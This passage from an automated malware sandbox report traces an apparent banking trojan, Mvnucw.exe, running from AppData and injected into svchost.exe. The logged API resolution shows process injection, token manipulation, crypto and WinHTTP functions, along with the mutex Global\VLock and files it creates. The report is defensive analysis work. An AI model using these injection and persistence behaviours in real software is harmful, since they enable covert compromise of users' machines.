Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x1400190f8, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019100, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019108, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019110, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019118, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019120, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019128, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019130, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019138, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019140, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x20010, size = 26	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019148, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019150, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019160, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019168, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019170, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019178, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x140019180, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x7fffffd6010, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x282830, size = 8	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x20010, size = 116	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x282848, size = 16	1	Fn Data
Modify Memory	#7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0xb6c	address = 0x70000, size = 16	1	Fn Data

Created Files

Filename	File Size	Hash Values	YARA Match	Actions
c:\users\adu0vk iwa5kls\appdata\roaming\winapp\client_id	0.10 KB (106 bytes)	MD5: c9e2607b0faa2a1d36e4ebc553f41698 SHA1: b8c4d60f72d70bbf8ce3ff1e16f7fe659cda9821 SHA256: fa6c18a934575a42088ed671a0bb0de633b8f00e1226a38596f6b625c1455e3e		File Actions Show Properties Download
c:\users\adu0vk iwa5kls\appdata\roaming\winapp\group_tag	0.01 KB (12 bytes)	MD5: 20d4581a76fac9a75b1300485c2c2ce4 SHA1: 56f0501fc59c0a9f5f6967cd7f03e5d4f5b8adf6 SHA256: 60e79d113cf1adb6e594a3ab1eef644f274cfaf004b576b6592da7aa6119b67d		File Actions Show Properties Download

Threads

Thread 0x840

(Host: 272, Network: 25)

Category	Operation	Information	Count	Logfile
Module	Load	module_name = msvcrt.dll, base_address = 0x0	1	Fn
Module	Get Address	function = _fmode, ordinal = 0, address_out = 0x20017	1	Fn
Module	Get Address	function = _commode, ordinal = 0, address_out = 0x20019	1	Fn
Module	Get Address	function = ?terminate@@YAXXZ, ordinal = 0, address_out = 0x20022	1	Fn
Module	Get Address	function = __setusermatherr, ordinal = 0, address_out = 0x20021	1	Fn
Module	Get Address	function = memcpy, ordinal = 0, address_out = 0x20017	1	Fn
Module	Get Address	function = _wtoi, ordinal = 0, address_out = 0x20016	1	Fn
Module	Get Address	function = _amsg_exit, ordinal = 0, address_out = 0x2001b	1	Fn
Module	Get Address	function = tolower, ordinal = 0, address_out = 0x20018	1	Fn
Module	Get Address	function = rand, ordinal = 0, address_out = 0x20015	1	Fn
Module	Get Address	function = ??_V@YAXPEAX@Z, ordinal = 0, address_out = 0x2001f	1	Fn
Module	Get Address	function = _itow, ordinal = 0, address_out = 0x20016	1	Fn
Module	Get Address	function = _vsnprintf, ordinal = 0, address_out = 0x2001b	1	Fn
Module	Get Address	function = exit, ordinal = 0, address_out = 0x20015	1	Fn
Module	Get Address	function = __wgetmainargs, ordinal = 0, address_out = 0x2001f	1	Fn
Module	Get Address	function = __C_specific_handler, ordinal = 0, address_out = 0x20025	1	Fn
Module	Get Address	function = _XcptFilter, ordinal = 0, address_out = 0x2001c	1	Fn
Module	Get Address	function = _exit, ordinal = 0, address_out = 0x20016	1	Fn
Module	Get Address	function = _cexit, ordinal = 0, address_out = 0x20017	1	Fn
Module	Get Address	function = _wcmdln, ordinal = 0, address_out = 0x20018	1	Fn
Module	Get Address	function = _initterm, ordinal = 0, address_out = 0x2001a	1	Fn
Module	Get Address	function = _CxxThrowException, ordinal = 0, address_out = 0x20023	1	Fn
Module	Get Address	function = memset, ordinal = 0, address_out = 0x20017	1	Fn
Module	Get Address	function = ??1type_info@@UEAA@XZ, ordinal = 0, address_out = 0x20026	1	Fn
Module	Get Address	function = srand, ordinal = 0, address_out = 0x20016	1	Fn
Module	Get Address	function = _vsnwprintf, ordinal = 0, address_out = 0x2001c	1	Fn
Module	Get Address	function = ??2@YAPEAX_K@Z, ordinal = 0, address_out = 0x2001f	1	Fn
Module	Get Address	function = _time64, ordinal = 0, address_out = 0x20018	1	Fn
Module	Get Address	function = _localtime64, ordinal = 0, address_out = 0x2001d	1	Fn
Module	Get Address	function = ??3@YAXPEAX@Z, ordinal = 0, address_out = 0x2001e	1	Fn
Module	Get Address	function = wcsftime, ordinal = 0, address_out = 0x20019	1	Fn
Module	Get Address	function = __set_app_type, ordinal = 0, address_out = 0x2001f	1	Fn
Module	Get Address	function = memcmp, ordinal = 0, address_out = 0x20017	1	Fn
Module	Load	module_name = KERNEL32.dll, base_address = 0x0	1	Fn
Module	Get Address	function = UnhandledExceptionFilter, ordinal = 0, address_out = 0x20029	1	Fn
Module	Get Address	function = RtlLookupFunctionEntry, ordinal = 0, address_out = 0x20027	1	Fn
Module	Get Address	function = TerminateProcess, ordinal = 0, address_out = 0x20021	1	Fn
Module	Get Address	function = LocalFree, ordinal = 0, address_out = 0x2001a	1	Fn
Module	Get Address	function = RtlCaptureContext, ordinal = 0, address_out = 0x20022	1	Fn
Module	Get Address	function = GetCurrentProcess, ordinal = 0, address_out = 0x20022	1	Fn
Module	Get Address	function = RtlVirtualUnwind, ordinal = 0, address_out = 0x20021	1	Fn
Module	Get Address	function = GetSystemTimeAsFileTime, ordinal = 0, address_out = 0x20028	1	Fn
Module	Get Address	function = GetCurrentProcessId, ordinal = 0, address_out = 0x20024	1	Fn
Module	Get Address	function = GetCurrentThreadId, ordinal = 0, address_out = 0x20023	1	Fn
Module	Get Address	function = GetTickCount, ordinal = 0, address_out = 0x2001d	1	Fn
Module	Get Address	function = QueryPerformanceCounter, ordinal = 0, address_out = 0x20028	1	Fn
Module	Get Address	function = GetModuleHandleW, ordinal = 0, address_out = 0x20021	1	Fn
Module	Get Address	function = SetUnhandledExceptionFilter, ordinal = 0, address_out = 0x2002c	1	Fn
Module	Get Address	function = GetStartupInfoW, ordinal = 0, address_out = 0x20020	1	Fn
Module	Get Address	function = GetFullPathNameW, ordinal = 0, address_out = 0x20021	1	Fn
Module	Get Address	function = lstrlenW, ordinal = 0, address_out = 0x20019	1	Fn
Module	Get Address	function = LoadLibraryA, ordinal = 0, address_out = 0x2001d	1	Fn
Module	Get Address	function = GetProcAddress, ordinal = 0, address_out = 0x2001f	1	Fn
Module	Get Address	function = GetLastError, ordinal = 0, address_out = 0x2001d	1	Fn
Module	Get Address	function = LoadLibraryW, ordinal = 0, address_out = 0x2001d	1	Fn
Module	Get Address	function = Sleep, ordinal = 0, address_out = 0x20016	1	Fn
Module	Load	module_name = ADVAPI32.dll, base_address = 0x0	1	Fn
Module	Get Address	function = AdjustTokenPrivileges, ordinal = 0, address_out = 0x20026	1	Fn
Module	Load	module_name = ole32.dll, base_address = 0x0	1	Fn
Module	Get Address	function = CoInitializeSecurity, ordinal = 0, address_out = 0x20025	1	Fn
Module	Get Address	function = CoInitializeEx, ordinal = 0, address_out = 0x2001f	1	Fn
Module	Load	module_name = OLEAUT32.dll, base_address = 0x0	1	Fn
Module	Get Address	function = 0, ordinal = 4, address_out = 0x20000	1	Fn
Module	Get Address	function = 0, ordinal = 6, address_out = 0x20000	1	Fn
Module	Get Address	function = 0, ordinal = 8, address_out = 0x20000	1	Fn
Module	Get Address	function = 0, ordinal = 9, address_out = 0x20000	1	Fn
Module	Get Address	function = 0, ordinal = 2, address_out = 0x20000	1	Fn
Module	Load	module_name = WINHTTP.dll, base_address = 0x0	1	Fn
Module	Get Address	function = WinHttpSendRequest, ordinal = 0, address_out = 0x20023	1	Fn
Module	Get Address	function = WinHttpSetTimeouts, ordinal = 0, address_out = 0x20023	1	Fn
Module	Get Address	function = WinHttpSetOption, ordinal = 0, address_out = 0x20021	1	Fn
Module	Get Address	function = WinHttpConnect, ordinal = 0, address_out = 0x2001f	1	Fn
Module	Get Address	function = WinHttpCloseHandle, ordinal = 0, address_out = 0x20023	1	Fn
Module	Get Address	function = WinHttpQueryHeaders, ordinal = 0, address_out = 0x20024	1	Fn
Module	Get Address	function = WinHttpCrackUrl, ordinal = 0, address_out = 0x20020	1	Fn
Module	Get Address	function = WinHttpReadData, ordinal = 0, address_out = 0x20020	1	Fn
Module	Get Address	function = WinHttpOpenRequest, ordinal = 0, address_out = 0x20023	1	Fn
Module	Get Address	function = WinHttpOpen, ordinal = 0, address_out = 0x2001c	1	Fn
Module	Get Address	function = WinHttpQueryDataAvailable, ordinal = 0, address_out = 0x2002a	1	Fn
Module	Get Address	function = WinHttpReceiveResponse, ordinal = 0, address_out = 0x20027	1	Fn
Module	Load	module_name = WS2_32.dll, base_address = 0x0	1	Fn
Module	Get Address	function = getaddrinfo, ordinal = 0, address_out = 0x2001c	1	Fn
Module	Get Address	function = 0, ordinal = 115, address_out = 0x20000	1	Fn
Module	Get Address	function = 0, ordinal = 57, address_out = 0x20000	1	Fn
Module	Get Address	function = 0, ordinal = 116, address_out = 0x20000	1	Fn
Module	Get Address	function = freeaddrinfo, ordinal = 0, address_out = 0x2001d	1	Fn
System	Get Time	type = System Time, time = 2017-09-25 20:33:39 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 130619	1	Fn
Module	Get Handle	module_name = private_0x0000000140000000, base_address = 0x140000000	1	Fn
Module	Load	module_name = kernel32.dll, base_address = 0x77320000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateThread, address_out = 0x77336580	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetComputerNameW, address_out = 0x7732d130	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = lstrcmpW, address_out = 0x7733d9c0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = lstrlenW, address_out = 0x77333ec0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetFullPathNameW, address_out = 0x773376e0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FindFirstFileW, address_out = 0x7733bd80	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FindResourceW, address_out = 0x77339b50	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FreeLibrary, address_out = 0x77336620	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = LoadResource, address_out = 0x773398c0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetModuleHandleW, address_out = 0x77343730	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetFileTime, address_out = 0x77333880	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = lstrcpynW, address_out = 0x7736bab0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetLastError, address_out = 0x77342dd0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FindClose, address_out = 0x7733bd60	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = LockResource, address_out = 0x77328720	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetSystemInfo, address_out = 0x77336f70	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FindNextFileW, address_out = 0x77331910	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetFileTime, address_out = 0x77324f80	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = LoadLibraryA, address_out = 0x77337070	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = lstrcmpA, address_out = 0x77381230	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetFileAttributesW, address_out = 0x773337a0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateDirectoryW, address_out = 0x7732ad70	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WaitForSingleObject, address_out = 0x77342b20	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SignalObjectAndWait, address_out = 0x77392c90	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetEvent, address_out = 0x77333f00	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateRemoteThread, address_out = 0x7736c4f0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = OpenProcess, address_out = 0x7733cad0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = VirtualFreeEx, address_out = 0x7736bb90	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = ReadProcessMemory, address_out = 0x7736bdc0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = TerminateProcess, address_out = 0x7736bca0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = VirtualProtectEx, address_out = 0x7736bb70	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = VirtualAllocEx, address_out = 0x7736bbd0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = ResetEvent, address_out = 0x7732d9a0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetExitCodeThread, address_out = 0x77331130	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateEventW, address_out = 0x77335290	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = DuplicateHandle, address_out = 0x77335d10	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WriteProcessMemory, address_out = 0x7736bad0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = ResumeThread, address_out = 0x773313a0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateMutexW, address_out = 0x773313c0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = LocalFree, address_out = 0x773347a0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = lstrcpyW, address_out = 0x7736e0d0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = DeleteFileW, address_out = 0x7732ad90	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetCurrentDirectoryW, address_out = 0x7733cab0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = EnterCriticalSection, address_out = 0x77592fc0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = MoveFileW, address_out = 0x773af7f0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetTempPathW, address_out = 0x77382040	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetStartupInfoW, address_out = 0x77338070	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetModuleFileNameW, address_out = 0x77337700	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetFileAttributesW, address_out = 0x7733bdd0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77593000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = Sleep, address_out = 0x77342b70	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x773364e0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetTickCount, address_out = 0x77342b00	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = MoveFileExW, address_out = 0x77323060	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateProcessW, address_out = 0x77341bb0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetTempFileNameW, address_out = 0x7736c030	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = lstrcmpiW, address_out = 0x77331930	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateFileW, address_out = 0x77331870	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = ReadFile, address_out = 0x77331500	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WriteFile, address_out = 0x773435a0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetFilePointer, address_out = 0x77331150	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetVersion, address_out = 0x773301d0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CloseHandle, address_out = 0x77342f80	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetVersionExW, address_out = 0x7732d910	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetCurrentProcess, address_out = 0x77335cf0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x77333f40	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetCurrentProcessId, address_out = 0x77335a50	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = lstrlenA, address_out = 0x7733caf0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x773b9330	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x77339b70	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetCurrentThreadId, address_out = 0x77333ee0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x77336500	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetModuleHandleA, address_out = 0x773365e0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WideCharToMultiByte, address_out = 0x773435f0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = MultiByteToWideChar, address_out = 0x77335b50	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = Process32FirstW, address_out = 0x77321e00	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = Process32NextW, address_out = 0x773220f0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x773221e0	1	Fn
Module	Load	module_name = ADVAPI32.dll, base_address = 0x7fefdb00000	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = GetUserNameW, address_out = 0x7fefdb11fd0	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = GetTokenInformation, address_out = 0x7fefdb1bd50	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = LookupAccountSidW, address_out = 0x7fefdb1b898	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = DuplicateTokenEx, address_out = 0x7fefdb0d310	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = CreateProcessAsUserW, address_out = 0x7fefdb0afe8	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = EqualSid, address_out = 0x7fefdb1b820	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = OpenProcessToken, address_out = 0x7fefdb1bd70	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = FreeSid, address_out = 0x7fefdb1b818	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x7fefdb1b63c	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = CryptDestroyKey, address_out = 0x7fefdb0afa0	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = CryptHashData, address_out = 0x7fefdb0dac0	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = CryptDestroyHash, address_out = 0x7fefdb0db00	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = CryptDecrypt, address_out = 0x7fefdb3b6d0	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = CryptCreateHash, address_out = 0x7fefdb0dad4	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = CryptImportKey, address_out = 0x7fefdb0af6c	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = ConvertStringSecurityDescriptorToSecurityDescriptorW, address_out = 0x7fefdb12040	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = CryptReleaseContext, address_out = 0x7fefdb0dd10	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = CryptSetKeyParam, address_out = 0x7fefdb3b508	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = CryptAcquireContextW, address_out = 0x7fefdb0d98c	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = CryptGetHashParam, address_out = 0x7fefdb0db20	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = LookupPrivilegeValueW, address_out = 0x7fefdb1b9e0	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = AdjustTokenPrivileges, address_out = 0x7fefdb1b9b0	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RevertToSelf, address_out = 0x7fefdb0dd00	1	Fn
Module	Load	module_name = ole32.dll, base_address = 0x7fefede0000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoCreateInstance, address_out = 0x7fefee07490	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoUninitialize, address_out = 0x7fefee01314	1	Fn
Module	Load	module_name = CRYPT32.dll, base_address = 0x7fefd6f0000	1	Fn
Module	Get Address	module_name = Unknown module name, function = CryptStringToBinaryW, address_out = 0x7fefd73e9a0	1	Fn
Module	Get Address	module_name = Unknown module name, function = CryptBinaryToStringW, address_out = 0x7fefd724198	1	Fn
Module	Load	module_name = SHLWAPI.dll, base_address = 0x7feff2b0000	1	Fn
Module	Get Address	module_name = Unknown module name, function = PathFindFileNameW, address_out = 0x7feff2c3920	1	Fn
Module	Get Address	module_name = Unknown module name, function = PathAddBackslashW, address_out = 0x7feff2c3f70	1	Fn
Module	Get Address	module_name = Unknown module name, function = PathRenameExtensionW, address_out = 0x7feff2de6c0	1	Fn
Module	Get Address	module_name = Unknown module name, function = StrStrIW, address_out = 0x7feff2bfb70	1	Fn
Module	Get Address	module_name = Unknown module name, function = PathRemoveBackslashW, address_out = 0x7feff2bd014	1	Fn
Module	Get Address	module_name = Unknown module name, function = PathRemoveFileSpecW, address_out = 0x7feff2ba43c	1	Fn
Module	Get Address	module_name = Unknown module name, function = PathFindExtensionW, address_out = 0x7feff2c2b00	1	Fn
Module	Load	module_name = ntdll.dll, base_address = 0x77540000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ntdll.dll, function = NtQueryInformationProcess, address_out = 0x775914a0	1	Fn
Module	Load	module_name = IPHLPAPI.dll, base_address = 0x7fefb7e0000	1	Fn
Module	Get Address	module_name = Unknown module name, function = GetAdaptersInfo, address_out = 0x7fefb7e792c	1	Fn
Module	Load	module_name = USERENV.dll, base_address = 0x7fefc840000	1	Fn
Module	Get Address	module_name = Unknown module name, function = CreateEnvironmentBlock, address_out = 0x7fefc8410b0	1	Fn
Module	Get Address	module_name = Unknown module name, function = DestroyEnvironmentBlock, address_out = 0x7fefc841080	1	Fn
Module	Get Address	module_name = Unknown module name, function = LoadUserProfileW, address_out = 0x7fefc841170	1	Fn
Module	Get Address	module_name = Unknown module name, function = UnloadUserProfile, address_out = 0x7fefc843670	1	Fn
Module	Get Filename	module_name = WS2_32.dll, process_name = c:\windows\system32\svchost.exe, file_name_orig = C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winapp\Mvnucw.exe, size = 512	1	Fn
System	Get Time	type = Ticks, time = 130650	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Load	module_name = Ncrypt.dll, base_address = 0x7fefcf20000	1	Fn
Module	Load	module_name = Bcrypt.dll, base_address = 0x7fefcef0000	1	Fn
Module	Get Address	module_name = Unknown module name, function = NCryptOpenStorageProvider, address_out = 0x7fefcf29990	1	Fn
Module	Get Address	module_name = Unknown module name, function = NCryptImportKey, address_out = 0x7fefcf255f0	1	Fn
Module	Get Address	module_name = Unknown module name, function = NCryptDeleteKey, address_out = 0x7fefcf4f6a0	1	Fn
Module	Get Address	module_name = Unknown module name, function = NCryptFreeObject, address_out = 0x7fefcf25c30	1	Fn
Module	Get Address	module_name = Unknown module name, function = BCryptOpenAlgorithmProvider, address_out = 0x7fefcef2640	1	Fn
Module	Get Address	module_name = Unknown module name, function = BCryptImportKeyPair, address_out = 0x7fefcef1d30	1	Fn
Module	Get Address	module_name = Unknown module name, function = BCryptGetProperty, address_out = 0x7fefcef1510	1	Fn
Module	Get Address	module_name = Unknown module name, function = BCryptVerifySignature, address_out = 0x7fefcf05bc0	1	Fn
Module	Get Address	module_name = Unknown module name, function = BCryptCloseAlgorithmProvider, address_out = 0x7fefcef32b0	1	Fn
Module	Get Address	module_name = Unknown module name, function = BCryptDestroyKey, address_out = 0x7fefcef16a0	1	Fn
System	Get Info	type = Operating System	1	Fn
COM	Create	interface = 2FABA4C7-4DA9-4013-9697-20CC3FD40F85, cls_context = CLSCTX_INPROC_SERVER	1	Fn
Mutex	Create	mutex_name = Global\VLock	1	Fn
System	Sleep	duration = 30000 milliseconds (30.000 seconds)	1	Fn
Module	Load	module_name = kernel32.dll, base_address = 0x77320000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapAlloc, address_out = 0x775933a0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcessHeap, address_out = 0x77343050	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapFree, address_out = 0x77343070	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapReAlloc, address_out = 0x77573f20	1	Fn
Module	Get Filename	module_name = WS2_32.dll, process_name = c:\windows\system32\svchost.exe, file_name_orig = C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winapp\Mvnucw.exe, size = 260	2	Fn
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77320000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x7732b7e0	1	Fn
System	Get Info	type = Hardware Information	1	Fn
File	Get Info	filename = Modules\, type = file_attributes	1	Fn
File	Create Directory	Modules\	1	Fn
System	Get Info	type = Operating System	1	Fn
File	Create	filename = client_id, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Module	Get Filename	module_name = WS2_32.dll, process_name = c:\windows\system32\svchost.exe, file_name_orig = C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winapp\Mvnucw.exe, size = 260	1	Fn
